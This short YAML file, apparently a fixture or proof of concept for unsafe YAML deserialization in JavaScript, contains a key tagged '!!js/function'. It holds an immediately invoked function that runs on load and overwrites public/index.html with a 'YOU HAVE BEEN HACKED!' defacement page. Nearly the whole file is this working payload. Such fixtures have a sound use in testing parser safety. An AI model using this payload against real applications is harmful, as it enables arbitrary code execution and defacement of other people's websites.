---
hi: there
test: !!js/function |
  function f() {
    console.log('evil start');
    fs.writeFileSync('public/index.html', '<html><head><style>body{background-color:#000;color:#fff;margin-top:50px;text-align:center;}h1{font-family:Impact,Arial;font-size:60px;}big{font-size:80px;font-family:Courier New;font-weight:bold;}</style></head><body><h1>YOU HAVE BEEN HACKED!</h1><big>¯\\_(ツ)_/¯</big></body></html>', 'utf8');
    console.log('evil done');
  }();
